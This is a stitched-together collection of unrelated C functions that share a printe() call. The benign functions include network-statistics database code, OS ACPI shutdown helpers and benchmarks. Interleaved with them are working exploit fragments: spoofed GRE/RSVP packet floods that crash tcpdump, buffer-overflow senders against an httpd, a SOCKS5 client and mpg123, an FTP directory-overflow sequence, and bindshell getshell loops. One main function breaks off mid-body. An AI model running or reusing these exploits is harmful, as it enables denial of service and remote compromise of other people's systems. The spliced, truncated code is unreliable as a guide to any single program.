int datalist_writedb(DSTATE *s)
{
if (!s->dodbsave) {
return 1;
}
if (!checkdb(s->datalist->data.interface, s->dirname)) {
return 0;
}
if (spacecheck(s->dirname)) {
if (writedb(s->datalist->data.interface, s->dirname, 0)) {
if (!s->dbsaved) {
snprintf(errorstring, 512, "Database write possible again.");
printe(PT_Info);
s->dbsaved = 1;
}
} else {
if (s->dbsaved) {
snprintf(errorstring, 512, "Unable to write database, continuing with cached data.");
printe(PT_Error);
s->dbsaved = 0;
}
}
} else {
/* show freespace error only once */
if (s->dbsaved) {
snprintf(errorstring, 512, "Free diskspace check failed, unable to write database, continuing with cached data.");
printe(PT_Error);
s->dbsaved = 0;
}
}
return 1;
}
/* (spoofed) generates and sends a (GRE) ip packet. */
void gre_spoof(unsigned int daddr,unsigned int saddr){
signed int sock=0,on=1;
unsigned int psize=0;
char *p,*s;
struct sockaddr_in sa;
struct iph ip;
struct greh gre;
struct sumh sum;
/* create raw (GRE) socket. */
if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_GRE))<0)
printe("could not allocate raw socket.",1);
/* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
printe("could not set IP_HDRINCL socket option.",1);
#endif
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=daddr;
psize=(sizeof(struct iph)+sizeof(struct greh)+sizeof(payload)-1);
memset(&ip,0,sizeof(struct iph));
memset(&gre,0,sizeof(struct greh));
/* values not filled = 0, from the memset() above. */
ip.ihl=5;
ip.version=4;
ip.tot_len=htons(psize);
ip.saddr=(saddr?saddr:random()%0xffffffff);
ip.daddr=daddr;
ip.ttl=(64*(random()%2+1));
ip.protocol=IPPROTO_GRE;
ip.frag_off=64;
/* OSI. (to isoclns_print(), then to isis_print()) */
gre.protocol=htons(254);
/* needed for the ip checksum. */
sum.saddr=ip.saddr;
sum.daddr=ip.daddr;
sum.fill=0;
sum.protocol=ip.protocol;
sum.len=htons(sizeof(struct greh)+sizeof(payload)-1);
/* make sum/calc buffer for the ip checksum. (correct) */
if(!(s=(char *)malloc(sizeof(struct iph)+1)))
printe("malloc() failed.",1);
memset(s,0,(sizeof(struct iph)+1));
memcpy(s,&ip,sizeof(struct iph));
ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
free(s);
/* put the packet together. */
if(!(p=(char *)malloc(psize+1)))
printe("malloc() failed.",1);
memset(p,0,psize);
memcpy(p,&ip,sizeof(struct iph));
memcpy(p+sizeof(struct iph),&gre,sizeof(struct greh));
memcpy(p+(sizeof(struct iph)+sizeof(struct greh)),
payload,sizeof(payload));
/* send the malformed (GRE) packet. (ISIS data) */
if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
sizeof(struct sockaddr))<psize)
printe("failed to send forged GRE packet.",1);
free(p);
return;
}
unsigned short netris_connect(char *hostname,
unsigned short port){
int sock;
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if((s.sin_addr.s_addr=inet_addr(hostname))){
if(!(t=gethostbyname(hostname)))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("netris connection failed.",1);
alarm(0);
printf("[*] successfully connected: %s:%d.\n",hostname,port);
write(sock,getcode(),BUFSIZE);
sleep(1);
close(sock);
return(0);
}
int mod_writenull(A_UNUSED int argc,A_UNUSED char **argv) {
uint64_t times[ARRAY_SIZE(sizes)] = {0};
int fd = open("/dev/null",O_WRONLY);
if(fd < 0) {
printe("Unable to open /dev/null");
return 1;
}
for(size_t s = 0; s < ARRAY_SIZE(sizes); ++s) {
uint64_t start = rdtsc();
for(int i = 0; i < PACKET_COUNT; ++i) {
if(write(fd,buffer,sizes[s]) != (ssize_t)sizes[s])
printe("write failed");
}
times[s] = rdtsc() - start;
}
close(fd);
for(size_t s = 0; s < ARRAY_SIZE(sizes); ++s) {
printf("per-msg=%5Lu throughput=%Lu MB/s (%db packets)\n",
times[s] / PACKET_COUNT,
(sizes[s] * PACKET_COUNT) / tsctotime(times[s]),sizes[s]);
}
return 0;
}
void fkey_connect(unsigned short port){
int sock=0,l=0,m=0;
char buf[1024+1];
struct hostent *t;
struct sockaddr_in s;
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
s.sin_family=AF_INET;
s.sin_port=htons(port);
printf("[*] attempting to connect: localhost:%u.\n",port);
if((s.sin_addr.s_addr=inet_addr("127.0.0.1"))){
if(!(t=gethostbyname("localhost")))
printe("couldn't resolve hostname.",1);
memcpy((char*)&s.sin_addr,(char*)t->h_addr,
sizeof(s.sin_addr));
}
signal(SIGALRM,sig_alarm);
alarm(3);
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("connection failed.",1);
alarm(0);
printf("[*] successfully connected: localhost:%u.\n",port);
write(sock,TMPFILE,strlen(TMPFILE));
alarm(5);
for(memset(buf,0,1025);(l=read(sock,buf,1024));memset(buf,0,1025)){
fputs(buf,stderr);
m+=l;
}
alarm(0);
if(m<=0)
printe("exploit failed, file doesn't exist or zero-length file.",0);
close(sock);
return;
}
void *x86Machine::mapTable(const char *name,size_t *len) {
char path[MAX_PATH_LEN];
snprintf(path,sizeof(path),"/sys/acpi/%s",name);
int fd = open(path,O_RDONLY);
if(fd < 0) {
printe("open of %s failed",path);
return NULL;
}
off_t off = seek(fd,0,SEEK_END);
if(off < 0) {
printe("seek in %s failed",path);
return NULL;
}
*len = off;
if(seek(fd,0,SEEK_SET) < 0) {
printe("seek in %s failed",path);
return NULL;
}
void *res = mmap(NULL,*len,*len,PROT_READ,MAP_PRIVATE,fd,0);
if(res == NULL) {
printe("mmap of %s failed",path);
return NULL;
}
close(fd);
return res;
}
static void removeRec(const char *path,bool rec) {
if(isdir(path)) {
if(!rec) {
printe("Omitting directory '%s'",path);
return;
}
char tmp[MAX_PATH_LEN];
DIR *dir = opendir(path);
struct dirent e;
while(readdir(dir,&e)) {
if(strcmp(e.d_name,".") == 0 || strcmp(e.d_name,"..") == 0)
continue;
snprintf(tmp,sizeof(tmp),"%s/%s",path,e.d_name);
removeRec(tmp,rec);
}
closedir(dir);
if(rmdir(path) < 0)
printe("Unable to remove directory '%s'",path);
}
else if(unlink(path) < 0)
printe("Unable to unlink '%s'",path);
}
// source: http://forum.osdev.org/viewtopic.php?t=16990
bool x86Machine::shutdownSupported(ShutdownInfo *info) {
size_t len;
// this is obviously not the intended way of using ACPI to power off the PC, because we would
// need an AML interpreter for that, but it seems to work fine on quite a few machines.
FACP *facp = reinterpret_cast<FACP*>(mapTable("FACP",&len));
if(facp == NULL)
return false;
// map the DSDT
sRSDT *dsdt = reinterpret_cast<sRSDT*>(mapTable("DSDT",&len));
if(dsdt == NULL)
return false;
size_t dsdtLength = dsdt->length;
uint8_t *ptr = reinterpret_cast<uint8_t*>(dsdt);
// skip header
ptr += 36 * 4;
dsdtLength -= 36 * 4;
while(dsdtLength-- > 0) {
if(memcmp(ptr,"_S5_",4) == 0)
break;
ptr++;
}
if(dsdtLength <= 0) {
printe("_S5 not present");
return false;
}
// check for valid AML structure
if(!(*(ptr - 1) == 0x08 || (*(ptr - 2) == 0x08 && *(ptr - 1) == '\\')) || *(ptr + 4) != 0x12) {
printe("_S5 parse error");
return false;
}
// calculate PkgLength size
ptr += 5;
ptr += ((*ptr & 0xC0) >> 6) + 2;
// skip byteprefix
if(*ptr == 0x0A)
ptr++;
info->SLP_TYPa = *(ptr) << 10;
ptr++;
// skip byteprefix
if(*ptr == 0x0A)
ptr++;
info->SLP_TYPb = *(ptr) << 10;
info->PM1a_CNT = facp->PM1a_CNT_BLK;
info->PM1b_CNT = facp->PM1b_CNT_BLK;
info->SLP_EN = 1 << 13;
// request ports
if(reqports(info->PM1a_CNT,2) < 0 || (info->PM1b_CNT != 0 && reqports(info->PM1b_CNT,2) < 0)) {
printe("Unable to request ports");
return false;
}
return true;
}
char *socks5_bind(unsigned short port,unsigned int retaddr){
int ssock=0,sock=0,so=1;
socklen_t salen=0;
unsigned char *buf;
struct sockaddr_in ssa,sa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
printf("[*] awaiting connection from: *:%d.\n",port);
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,2);
bzero((char*)&sa,sizeof(struct sockaddr_in));
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
close(ssock);
printf("[*] socks-5 server connection established.\n");
if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))
printe("socks5_bind(): allocating memory failed.",1);
memcpy(buf,"\x05\x00\x05\x00\x00\x03",6);
buf[6]=BUFSIZE;
memcpy(buf+7,getcode(retaddr),BUFSIZE);
printf("[*] sending specially crafted string. (exploit)\n");
write(sock,buf,BUFSIZE+7);
free(buf);
sleep(1);
close(sock);
printf("[*] socks-5 server connection closed.\n");
return(inet_ntoa(sa.sin_addr));
}
int pack_section(const u8 * source, u8 ** dest, u32 source_size) {
u32 packed_size;
u8 * packed;
z_stream c_stream;
packed_size = source_size * 1.2 + 2048;
packed = (u8 *) malloc(packed_size);
c_stream.zalloc = (alloc_func)0;
c_stream.zfree = (free_func)0;
c_stream.opaque = (voidpf)0;
if (deflateInit(&c_stream, 9) != Z_OK)
printe("Error during deflateInit.\n");
c_stream.next_in = source;
c_stream.avail_in = source_size;
c_stream.next_out = packed;
c_stream.avail_out = packed_size;
if (deflate(&c_stream, Z_FINISH) != Z_STREAM_END)
printe("Error during deflate.\n");
if (deflateEnd(&c_stream) != Z_OK)
printe("Error during deflateEnd.\n");
packed_size = c_stream.total_out;
packed = realloc(packed, packed_size);
*dest = packed;
return packed_size;
}
/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int amt=DFL_AMOUNT;
unsigned int daddr=0,saddr=0;
printf("[*] tcpdump(/ethereal)[]: (RSVP) rsvp_print() infinite loop "
"DOS.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2)saddr=getip(argv[2]);
if(argc>3)amt=atoi(argv[3]);
if(!amt)printe("no packets?",1);
printf("[*] destination\t: %s\n",argv[1]);
if(!nospoof)
printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
printf("[*] amount\t: %u\n\n",amt);
printf("[+] sending(packet = .): ");
fflush(stdout);
while(amt--){
/* spice things up. */
srandom(time(0)+amt);
rsvp_spoof(daddr,saddr);
printf(".");
fflush(stdout);
usleep(50000);
}
printf("\n\n[*] done.\n");
fflush(stdout);
exit(0);
}
int main(int argc,char *argv[]) {
bool follow = false;
int opt;
while((opt = getopt(argc,argv,"f")) != -1) {
switch(opt) {
case 'f': follow = true; break;
default:
usage(argv[0]);
}
}
if(optind >= argc)
usage(argv[0]);
for(int i = optind; i < argc; ++i) {
char tmp[MAX_PATH_LEN];
if(follow) {
if(canonpath(tmp,sizeof(tmp),argv[i]) < 0) {
printe("readlink for '%s' failed",argv[i]);
continue;
}
puts(tmp);
}
else {
if(!islink(argv[i]))
printe("'%s' is no symbolic link",argv[i]);
else if(readlink(argv[i],tmp,sizeof(tmp)) < 0)
printe("readlink for '%s' failed",argv[i]);
else
puts(tmp);
}
}
return EXIT_SUCCESS;
}
int mod_pagefault(A_UNUSED int argc,A_UNUSED char *argv[]) {
size_t i;
size_t total = MAP_SIZE * PAGE_SIZE;
char *buffer = malloc(total);
if(!buffer) {
printe("Unable to create buffer");
return 1;
}
int fd = creat("/tmp/test",0600);
if(fd < 0) {
printe("open of /tmp/test failed");
return 1;
}
srand(time(NULL));
for(i = 0; i < total; ++i)
buffer[i] = rand();
if(write(fd,buffer,total) != (ssize_t)total) {
printe("write failed");
return 1;
}
close(fd);
causePagefaults(NULL);
causePagefaults("/tmp/test");
causePagefaults("/home/hrniels/testdir/bbc.bmp");
if(unlink("/tmp/test") < 0)
printe("Unable to unlink test-file");
free(buffer);
return 0;
}
int getbtime(void)
{
int result=0;
#if defined(__linux__)
FILE *fp;
int check;
char temp[64], statline[128];
if ((fp=fopen("/proc/stat","r"))==NULL) {
snprintf(errorstring, 512, "Unable to read /proc/stat: %s", strerror(errno));
printe(PT_Error);
if (noexit) {
return 0;
} else {
exit(1);
}
}
check=0;
while (fgets(statline,128,fp)!=NULL) {
sscanf(statline,"%63s",temp);
if (strcmp(temp,"btime")==0) {
/* if (debug)
printf("\n%s\n",statline); */
check=1;
break;
}
}
fclose(fp);
if (check==0) {
snprintf(errorstring, 512, "btime missing from /proc/stat.");
printe(PT_Error);
if (noexit) {
return 0;
} else {
exit(1);
}
}
result = strtoul(statline+6, (char **)NULL, 0);
#elif defined(__FreeBSD__) || defined(__NetBSD__) || defined(__OpenBSD__) || defined(__APPLE__) || defined(__FreeBSD_kernel__)
struct timeval btm;
size_t len = sizeof(btm);
int mib[2] = {CTL_KERN, KERN_BOOTTIME};
if (sysctl(mib, 2, &btm, &len, NULL, 0) < 0) {
if (debug)
printf("sysctl(kern.boottime) failed.\n");
return 0;
}
result = btm.tv_sec;
#endif
return result;
}
void filldatabaselist(DSTATE *s)
{
DIR *dir;
struct dirent *di;
if ((dir=opendir(s->dirname))==NULL) {
snprintf(errorstring, 512, "Unable to access database directory \"%s\" (%s), exiting.", s->dirname, strerror(errno));
printe(PT_Error);
/* clean daemon stuff before exit */
if (s->rundaemon && !debug) {
close(pidfile);
unlink(cfg.pidfile);
}
ibwflush();
exit(EXIT_FAILURE);
}
while ((di=readdir(dir))) {
if ((di->d_name[0]=='.') || (strcmp(di->d_name, DATABASEFILE)==0)) {
continue;
}
if (debug) {
printf("\nProcessing file \"%s/%s\"...\n", s->dirname, di->d_name);
}
if (!cacheadd(di->d_name, s->sync)) {
snprintf(errorstring, 512, "Cache memory allocation failed, exiting.");
printe(PT_Error);
/* clean daemon stuff before exit */
if (s->rundaemon && !debug) {
close(pidfile);
unlink(cfg.pidfile);
}
ibwflush();
exit(EXIT_FAILURE);
}
s->dbcount++;
}
closedir(dir);
s->sync = 0;
/* disable update interval check for one loop if database list was refreshed */
/* otherwise increase default update interval since there's nothing else to do */
if (s->dbcount) {
s->updateinterval = 0;
intsignal = 42;
s->prevdbsave = s->current;
/* list monitored interfaces to log */
cachestatus();
} else {
s->updateinterval = 120;
}
}
static void readTable(const char *name,sRSDT *table) {
char path[MAX_PATH_LEN];
snprintf(path,sizeof(path),"/sys/acpi/%s",name);
int fd = open(path,O_RDONLY);
if(fd < 0)
printe("open of %s failed",path);
if(read(fd,table,sizeof(sRSDT)) != sizeof(sRSDT))
printe("read of %s failed",path);
close(fd);
}
/* start. */
int main(int argc,char **argv){
unsigned char tmp_new=0;
signed int chr=0,rsock=0;
unsigned int bs=0;
struct hostent *t;
in_addr_t s=0;
printf("[*] sumus[v0.2.2]: (httpd) remote buffer overflow explo"
"it.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n");
tbl.port=DFL_PORT;
tbl.sport=DFL_SPORT;
tbl.addr=DFL_RETADDR;
tbl.loct_kk=DFL_LOCT_KK;
while((chr=getopt(argc,argv,"h:p:s:c:r:l:n:"))!=EOF){
switch(chr){
case 'h':
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
printe("main(): allocating memory failed",1);
break;
case 'p':
tbl.port=atoi(optarg);
break;
case 's':
tbl.sport=atoi(optarg);
break;
case 'c':
if((s=inet_addr(optarg))){
if((t=gethostbyname(optarg)))
memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
if(s==-1)s=0;
if(!s)printe("invalid host/ip. (-c option)",0);
}
break;
case 'r':
sscanf(optarg,"%x",&tbl.addr);
break;
case 'l':
tbl.loct_kk=atoi(optarg);
break;
case 'n':
tmp_new=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(!tbl.host)usage(argv[0]);
if(tbl.loct_kk<0||tbl.loct_kk>BUFSIZE)tbl.loct_kk=DFL_LOCT_KK;
/* set bind port for shellcode. */
if(!s){
bs=strlen(x86_bind);
x86_bind[20]=(tbl.sport&0xff00)>>8;
x86_bind[21]=(tbl.sport&0x00ff);
x86_ptr=x86_bind;
}
void ftp_parse(int ftpsd){
char *buf4;
char *bux;
if(!(buf4=(char *)malloc(141+1)))
printe(" allocating memory failed.",1);
if(!(bux=(char *)malloc(56+1)))
printe(" allocating memory failed.",1);
unsigned int offset=0;
unsigned int i=0;
memset(buf4, 0x42 , 141);
for(i=0;i<56;i+=4){*(long *)&bux[i]=jretaddr;}
ftp_read(ftpsd); /* get the banner. */
ftp_printf(ftpsd,"USER %s\r\n",user);
ftp_read(ftpsd);
ftp_printf(ftpsd,"PASS %s\r\n",pass);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",writedir);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",buf4);
ftp_read(ftpsd);
ftp_printf(ftpsd,"MKD %s\r\n",bux);
ftp_read(ftpsd);
ftp_printf(ftpsd,"CWD %s\r\n",bux);
ftp_read(ftpsd);
sleep(10);
close(ftpsd);
}
void getshell(char *hostname,unsigned short port){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
printf("[*] checking to see if the exploit was successful.\n");
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)
exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
int writedb(const char *iface, const char *dirname, int newdb)
{
FILE *db;
char file[512], backup[512];
snprintf(file, 512, "%s/%s", dirname, iface);
snprintf(backup, 512, "%s/.%s", dirname, iface);
/* try to make backup of old data if this isn't a new database */
if (!newdb && !backupdb(file, backup)) {
snprintf(errorstring, 512, "Unable to create database backup \"%s\".", backup);
printe(PT_Error);
return 0;
}
/* make sure version stays correct */
data.version=DBVERSION;
if ((db=fopen(file,"w"))==NULL) {
snprintf(errorstring, 512, "Unable to open database \"%s\" for writing: %s", file, strerror(errno));
printe(PT_Error);
return 0;
}
/* lock file */
if (!lockdb(fileno(db), 1)) {
fclose(db);
return 0;
}
/* update timestamp when not merging */
if (newdb!=2) {
data.lastupdated=time(NULL);
}
if (fwrite(&data,sizeof(DATA),1,db)==0) {
snprintf(errorstring, 512, "Unable to write database \"%s\": %s", file, strerror(errno));
printe(PT_Error);
fclose(db);
return 0;
} else {
if (debug) {
printf("db: Database \"%s\" saved.\n", file);
}
fclose(db);
if ((newdb) && (noexit==0)) {
snprintf(errorstring, 512, "-> A new database has been created.");
printe(PT_Info);
}
}
return 1;
}
int lockdb(int fd, int dbwrite)
{
int operation, locktry=1;
/* lock only if configured to do so */
if (!cfg.flock) {
return 1;
}
if (dbwrite) {
operation = LOCK_EX|LOCK_NB;
} else {
operation = LOCK_SH|LOCK_NB;
}
/* try locking file */
while (flock(fd, operation)!=0) {
if (debug) {
printf("db: Database access locked (%d, %d)\n", dbwrite, locktry);
}
/* give up if lock can't be obtained */
if (locktry>=LOCKTRYLIMIT) {
if (dbwrite) {
snprintf(errorstring, 512, "Locking database file for write failed for %d tries:\n%s (%d)", locktry, strerror(errno), errno);
} else {
snprintf(errorstring, 512, "Locking database file for read failed for %d tries:\n%s (%d)", locktry, strerror(errno), errno);
}
printe(PT_Error);
return 0;
}
/* someone else has the lock */
if (errno==EWOULDBLOCK) {
sleep(1);
/* real error */
} else {
if (dbwrite) {
snprintf(errorstring, 512, "Locking database file for write failed:\n%s (%d)", strerror(errno), errno);
} else {
snprintf(errorstring, 512, "Locking database file for read failed:\n%s (%d)", strerror(errno), errno);
}
printe(PT_Error);
return 0;
}
locktry++;
}
return 1;
}
void getshell(int ftpsock,unsigned int offset){
int sock,r;
fd_set fds;
char buf[4096+1];
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
printe("getshell(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(host))){
if(!(he=gethostbyname(host)))
printe("getshell(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,sizeof(sa.sin_addr));
}
sa.sin_port=htons(sport);
signal(SIGALRM,sig_alarm);
alarm(TIMEOUT);
printf("[*] checking for bindshell: %s:%d. (0x%.8x)\n",host,sport,
(!reverse?(baseaddr-offset):(baseaddr+offset)));
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",host,sport);
close(sock); /* don't want fd's to fill up. */
alarm(0);
return;
}
alarm(0);
printf("[*] successfully connected: %s:%d.\n",host,sport);
printf("[*] attempting to cleanup leftover directory(s).\n");
ftp_clean(ftpsock);
close(ftpsock);
printf("[*] entering remote shell. (%s:%d)\n\n",host,sport);
signal(SIGINT,SIG_IGN);
write(sock,"cd /;uname -a;id\n",18);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
int main(int argc, char** argv) {
if (argc < 2) {
helper();
return PARAM_E;
}
int i;
Vector *v = vector_create(2);
if (v == NULL) {
return MEMORY_E;
}
for (i = 1; i < argc; i++) {
switch (argv[i][0]) {
case 'f':
printe(v, vector_find(v, atoi(argv[++i])));
break;
case 'c':
printf("%d\n", vector_count(v, atoi(argv[++i])));
break;
case 'e':
printe(v, atoi(argv[++i]));
break;
case 'p':
if (!strcmp(argv[i], "print")) {
printv(v);
}
break;
case 's':
vector_sort(v, atoi(argv[++i]));
break;
case '-':
vector_remove(v, -atoi(argv[i]));
break;
default:
vector_insert(v, atoi(argv[i]), atoi(argv[i+1]));
i++;
break;
}
}
vector_destroy(v);
return SUCCESS;
}
/* the "audio server" fake daemon, what mpg123 connects to. */
char *audioserver_bind(void){
unsigned int salen=0;
int ssock=0,sock=0,so=1;
char *buf;
struct sockaddr_in ssa,sa;
if(!(buf=(char *)malloc(1024+1)))
printe("audioserver_bind(): allocating memory failed.",1);
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
/* not everywheres, maybe pretty close by now though. */
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
while(ssock){
printf("[*] awaiting connection from: *:%d.\n",port);
listen(ssock,1);
bzero((char*)&sa,sizeof(struct sockaddr_in));
salen=sizeof(sa);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
printf("[*] audio server connection established. (%s)\n",
inet_ntoa(sa.sin_addr));
/* to verify the agent, ie. "User-Agent: mpg123/0.59r\n". */
printf("[*] waiting for request information, to verify the client.\n");
read(sock,buf,1024);
if(strstr(buf,"mpg123/0.59r")||strstr(buf,"mpg123/0.59s")){
printf("[*] client is running an exploitable version, continuing.\n");
/* got the client we want, close the server socket. */
close(ssock);
ssock=0;
}
else{
printf("[!] client is not running an exploitable version, skipped.\n");
close(sock);
}
}
/* send the pre-packaged all-in-one exploit string. */
printf("[*] sending the string to exploit the overflow condition.\n");
write(sock,getbuf(),strlen(getbuf()));
/* sleeps always make me feel safer for some reason. */
sleep(1);
close(sock);
printf("[*] closed audio server connection.\n");
free(buf);
/* return the host that connected to us. */
return(inet_ntoa(sa.sin_addr));
}
static void sigHdlr(A_UNUSED int sig) {
if(waitingPid > 0) {
/* send SIGINT to the child */
if(kill(waitingPid,SIGINT) < 0)
printe("Unable to send signal to %d",waitingPid);
}
}
int datalist_timevalidation(DSTATE *s)
{
if (s->current >= data.lastupdated) {
data.lastupdated = s->current;
cacheupdate();
return 1;
}
/* skip update if previous update is less than a day in the future */
/* otherwise exit with error message since the clock is problably messed */
if (data.lastupdated > (s->current+86400)) {
snprintf(errorstring, 512, "Interface \"%s\" has previous update date too much in the future, exiting. (%d / %d)", data.interface, (unsigned int)data.lastupdated, (unsigned int)s->current);
printe(PT_Error);
/* clean daemon stuff before exit */
if (s->rundaemon && !debug) {
close(pidfile);
unlink(cfg.pidfile);
}
ibwflush();
exit(EXIT_FAILURE);
}
return 0;
}
void sighandler(int sig)
{
/* set signal */
intsignal = sig;
if (debug) {
switch (sig) {
case SIGHUP:
snprintf(errorstring, 512, "DEBUG: SIGHUP (%d)", sig);
break;
case SIGTERM:
snprintf(errorstring, 512, "DEBUG: SIGTERM (%d)", sig);
break;
case SIGINT:
snprintf(errorstring, 512, "DEBUG: SIGINT (%d)", sig);
break;
default:
snprintf(errorstring, 512, "DEBUG: Unknown signal %d", sig);
break;
}
printe(PT_Info);
}
}
static void f(int a) {
if(a % 128 == 0)
printf("&a = %p\n",&a);
if(kill(getpid(),SIGTERM) < 0)
printe("Unable to send signal");
f(a + 1);
}
// source: NUL/NRE
void x86Machine::rebootSysCtrlPort() {
if(reqport(0x92) < 0) {
printe("Unable to request port 0x92");
return;
}
outbyte(0x92,0x01);
}
void panicexit(const char *sourcefile, const int sourceline)
{
snprintf(errorstring, 512, "Unexpected error (%s), exiting. (%s:%d)\n", strerror(errno), sourcefile, sourceline);
fprintf(stderr, "%s\n", errorstring);
printe(PT_Error);
exit(EXIT_FAILURE);
}
